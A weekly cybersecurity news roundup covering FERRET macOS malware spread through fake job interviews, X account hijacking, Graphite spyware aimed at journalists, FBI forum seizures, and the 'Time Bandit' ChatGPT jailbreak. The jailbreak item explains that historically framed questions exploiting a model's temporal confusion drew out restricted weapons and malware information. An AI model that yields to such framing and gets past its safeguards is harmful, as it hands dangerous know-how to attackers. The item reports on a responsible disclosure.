Weekly Summary Cyberattacks Jan 30th-Feb5th

North Korean hackers target macOS with FERRET malware via fake job interviews   

A group of hackers linked to North Korea has deployed macOS malware, dubbed FERRET, to infect devices via fake job interviews. The campaign, dubbed Contagious Interview, tricks victims by posing as recruiters on LinkedIn and asking them to install supposed video calling tools. The malware enters systems through fraudulent links and npm packages disguised as legitimate software. Its capabilities include stealing browser credentials and cryptocurrency wallets, as well as executing malicious commands on the infected computer. In addition, the attackers have diversified their tactics by spreading the malware via fake issues on GitHub repositories. Cybersecurity researchers warn that these attacks reflect an evolution in the tactics of threat actors, who are looking for new ways to evade detection and expand their range of victims, from job seekers to software developers.  

Hackers step up attacks on influential accounts on X   

A recent cybersecurity report has warned of a growing phishing campaign targeting influential accounts on the social network X (formerly Twitter). The platform has been exploited by hackers taking control of profiles of politicians, journalists, tech companies and public figures to spread scams, especially related to cryptocurrencies. Attacks have even affected government agencies and media outlets, managing to block legitimate owners and spread malicious links. Cybercriminals employ fake emails about unauthorized access or copyright infringement to trick victims. Investigations traced the activities to servers in Belize and domains registered in Turkey, although the perpetrators have not been identified. 

WhatsApp reports espionage against journalists and civil society   

WhatsApp has revealed that nearly 100 journalists and members of civil society were targeted in an attack using Graphite spyware, developed by Israeli company Paragon Solutions. The Meta-owned company claimed to have “high confidence” that the devices of these individuals were compromised through a zero-click attack, which does not require the victim to interact with malicious links. Although it is unknown who ordered the attacks, WhatsApp has sent a “cease and desist” letter to Paragon and is considering legal action. The spying was reportedly stopped in December, but it is not yet known how long those affected were at risk. Paragon, which was recently sold to US firm AE Industrial Partners for $900 million, has been questioned for its contracts with governments and agencies, such as the US Department of Homeland Security. Its software, similar to NSO Group's Pegasus, allows full access to infected devices, including encrypted messages. WhatsApp continues to notify victims and to strengthen measures to prevent future attacks. 

 
Vulnerability detected in ChatGPT that allows circumvention of security restrictions 

  
A vulnerability has been identified in ChatGPT, called “Time Bandit”, which makes it possible to evade the safeguards implemented by OpenAI and access restricted information on weapons manufacturing, nuclear materials and malware development. The finding was made by the artificial intelligence and cybersecurity expert David Kuszmar, who detected that the language model presents a “temporal confusion” phenomenon. This flaw allows the system to be induced into a state in which it does not distinguish between past, present and future, making it easier to obtain sensitive information. After discovering the vulnerability, Kuszmar tried to communicate his findings to OpenAI and various government agencies without success. OpenAI was finally contacted through the CERT Coordination Center. The attack method exploits two key weaknesses: lack of temporal awareness of the model and ambiguity in rule interpretation. By asking questions framed in historical events, it is possible to induce ChatGPT to provide updated information in past contexts, circumventing its security constraints. Testing by researchers confirmed that this approach allows access to sensitive data, although OpenAI has implemented mitigations and continues to work on additional measures to correct the vulnerability.

FBI dismantles hacking forums in international operation 

The FBI, in collaboration with authorities in several countries, has seized the domains of hacking forums Cracked.io and Nulled.to, known for their involvement in cybercrime such as credential theft and brute force attacks. The action is part of “Operation Talent”, in which other sites such as StarkRDP.io, MySellix.io and Sellix.io, linked to the sale of stolen data and illicit software, have also been shut down. When users try to access the sites, they encounter error messages or warnings informing them of the seizure. The Cracked.io team has acknowledged the intervention on its Telegram channel, noting that they are still awaiting official documentation on the case. Europol has confirmed that the operation is still ongoing, and more information is expected soon.